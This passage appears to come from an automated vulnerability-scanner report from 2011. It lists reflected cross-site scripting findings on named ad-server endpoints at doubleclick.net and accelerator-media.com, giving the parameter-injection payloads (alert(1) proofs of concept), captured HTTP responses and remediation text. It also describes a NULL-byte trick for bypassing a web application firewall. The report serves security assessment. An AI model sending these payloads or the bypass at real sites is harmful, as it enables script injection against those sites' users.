This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6360 Date: Wed, 03 Aug 2011 13:13:02 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... t/2285348/Backup_300x250_3.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=90028641b100"-alert(1)-"c812f1ccf3a&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307- ...[SNIP]...
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dcb7'-alert(1)-'a3cc98cbbe4 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6356 Date: Wed, 03 Aug 2011 13:13:07 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=90028646dcb7'-alert(1)-'a3cc98cbbe4&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B67710619%3B4307- ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2ad1"-alert(1)-"9a23308a41e was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6356 Date: Wed, 03 Aug 2011 13:13:33 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345d2ad1"-alert(1)-"9a23308a41e&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B67710619%3B4307-300/250%3B43381312/43399099/1%3B%3B%7 ...[SNIP]...
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b81a'-alert(1)-'8f6882adeee was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6360 Date: Wed, 03 Aug 2011 13:13:38 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=7062843456b81a'-alert(1)-'8f6882adeee&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7 ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5714b"-alert(1)-"7ab23438929 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6360 Date: Wed, 03 Aug 2011 13:13:54 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e095714b"-alert(1)-"7ab23438929&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7Esscs%3D%3fhttp://www.regaine.co.uk/?utm_campaig ...[SNIP]...
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d409'-alert(1)-'ae76b5e7e5a was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6360 Date: Wed, 03 Aug 2011 13:13:59 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... rget=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e093d409'-alert(1)-'ae76b5e7e5a&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7Esscs%3D%3fhttp://www.regaine.co.uk/?utm_campaig ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28b38'-alert(1)-'182e7bb676f was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6360 Date: Wed, 03 Aug 2011 13:13:49 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM128b38'-alert(1)-'182e7bb676f&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7Esscs%3D%3 ...[SNIP]...
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c920b"-alert(1)-"e348b200b0b was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6356 Date: Wed, 03 Aug 2011 13:13:43 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]...
var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1c920b"-alert(1)-"e348b200b0b&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B67710619%3B4307-300/250%3B43381312/43399099/1%3B%3B%7Esscs%3D%3 ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c9f'-alert(1)-'38d64f32497 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6356 Date: Wed, 03 Aug 2011 13:13:28 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284b8c9f'-alert(1)-'38d64f32497&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B67710619%3B4307-300/250%3B43381312/43399 ...[SNIP]...
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b858"-alert(1)-"13c1c8366ff was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Date: Wed, 03 Aug 2011 13:13:23 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 50.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=224352842b858"-alert(1)-"13c1c8366ff&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B67710619%3B4307-300/250%3B43381314/43399 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d532'-alert(1)-'1d043040bff was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Date: Wed, 03 Aug 2011 13:13:18 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G1d532'-alert(1)-'1d043040bff&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B67710619%3B4307-300/25 ...[SNIP]...
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7db61"-alert(1)-"ea3173da7b3 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Date: Wed, 03 Aug 2011 13:13:12 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 85348/Backup_300x250.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G7db61"-alert(1)-"ea3173da7b3&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B67710619%3B4307-300/25 ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 791c5"-alert(1)-"f835b416d06 was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6360 Cache-Control: no-cache Pragma: no-cache Date: Wed, 03 Aug 2011 13:14:04 GMT Expires: Wed, 03 Aug 2011 13:14:04 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:48 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=791c5"-alert(1)-"f835b416d06http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/u%3B244023697%3B0-0%3B0%3B67710619%3B4307-300/250%3B43381302/43399089/1%3B%3B%7Esscs%3D%3fhttp://www.regaine.co.uk/?utm_campaign=REGAINE&utm ...[SNIP]...
The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63093'-alert(1)-'655f6b8ed5a was submitted in the destination parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Cache-Control: no-cache Pragma: no-cache Date: Wed, 03 Aug 2011 13:14:09 GMT Expires: Wed, 03 Aug 2011 13:14:09 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... \" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=63093'-alert(1)-'655f6b8ed5ahttp://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B67710619%3B4307-300/250%3B43381314/43399101/1%3B%3B%7Esscs%3D%3fhttp://www.regaine.co.uk/?utm_campaign=REGAINE&utm ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5808c'-alert(1)-'66a05006c64 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6343 Date: Wed, 03 Aug 2011 13:12:57 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:09 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... <a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!5808c'-alert(1)-'66a05006c64&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/k%3B244023697%3B2-0%3B0%3B677 ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d67aa"-alert(1)-"2267e9f64d1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6356 Date: Wed, 03 Aug 2011 13:12:51 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Aug 02 06:26:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ://s0.2mdn.net/2285348/Backup_300x250_2.gif"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00055/26000000000171386.1?!d67aa"-alert(1)-"2267e9f64d1&&PID=9002864&UIT=G&TargetID=22435284&AN=706284345&PG=UKHIM1&ASID=acf01dc7247e41d09d5291336e8d7e09&destination=http://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b58/17/db/%2a/a%3B244023697%3B1-0%3B0%3B677 ...[SNIP]...
2.37. http://ad.accelerator-media.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.accelerator-media.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9011"><script>alert(1)</script>f23b2653513 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=120x60§ion=17223&IASH=STAND&a9011"><script>alert(1)</script>f23b2653513=1 HTTP/1.1 Host: ad.accelerator-media.com Proxy-Connection: keep-alive Referer: http://subscription.live-astro.com/free_reading_template.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:12:02 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Wed, 03 Aug 2011 13:12:02 GMT Pragma: no-cache Content-Length: 4766 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id= ...[SNIP]... <a href="http://ad.accelerator-media.com/imageclick?IASH=STAND&a9011"><script>alert(1)</script>f23b2653513=1&Z=120x60&s=17223&_salt=1686391806&t=2" target="_parent"> ...[SNIP]...
2.38. http://ad.accelerator-media.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.accelerator-media.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ddff"-alert(1)-"a65d95cec7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=120x60§ion=17223&IASH=STAND&7ddff"-alert(1)-"a65d95cec7c=1 HTTP/1.1 Host: ad.accelerator-media.com Proxy-Connection: keep-alive Referer: http://subscription.live-astro.com/free_reading_template.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 03 Aug 2011 13:12:04 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Wed, 03 Aug 2011 13:12:04 GMT Pragma: no-cache Content-Length: 4721 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.accelerator-media.com/imp?7ddff"-alert(1)-"a65d95cec7c=1&IASH=STAND&Z=120x60&s=17223&_salt=4179874164";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_da ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecb22"-alert(1)-"76c61c26f6c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5615 Date: Wed, 03 Aug 2011 12:57:45 GMT
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Jul 26 12:21:49 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... .net/click%3Bh%3Dv8/3b58/7/69/%2a/j%3B244100576%3B0-0%3B0%3B67832026%3B4307-300/250%3B43264277/43282064/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/206255252.229430379/115855006/direct/01%3fhref=ecb22"-alert(1)-"76c61c26f6chttp://www.rac.co.uk/uk-breakdown/?TrafficSource=Display"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWind ...[SNIP]...
2.40. http://ad.doubleclick.net/adi/N4189.MSN/B5731231.62 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N4189.MSN/B5731231.62
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %005bd38"-alert(1)-"5de68b6a66b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bd38"-alert(1)-"5de68b6a66b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5665 Date: Wed, 03 Aug 2011 13:10:27 GMT
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Jul 26 12:25:00 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /click%3Bh%3Dv8/3b58/f/6f/%2a/e%3B244100576%3B1-0%3B0%3B67832983%3B4307-300/250%3B43264356/43282143/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/206255273.229430382/115052958/direct/01%3fhref=&%005bd38"-alert(1)-"5de68b6a66b=1http%3a%2f%2fwww.rac.co.uk/uk-breakdown/%3FTrafficSource%3DDisplay"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f8c2"-alert(1)-"b666318228d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 5611 Date: Wed, 03 Aug 2011 13:10:09 GMT
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Tue Jul 26 12:25:00 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... .net/click%3Bh%3Dv8/3b58/7/69/%2a/e%3B244100576%3B1-0%3B0%3B67832983%3B4307-300/250%3B43264356/43282143/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/206255273.229430382/115052958/direct/01%3fhref=5f8c2"-alert(1)-"b666318228dhttp://www.rac.co.uk/uk-breakdown/?TrafficSource=Display"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWind ...[SNIP]...
2.42. http://ad.doubleclick.net/adi/N4189.MSN/B5731231.66 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/N4189.MSN/B5731231.66
Issue detail
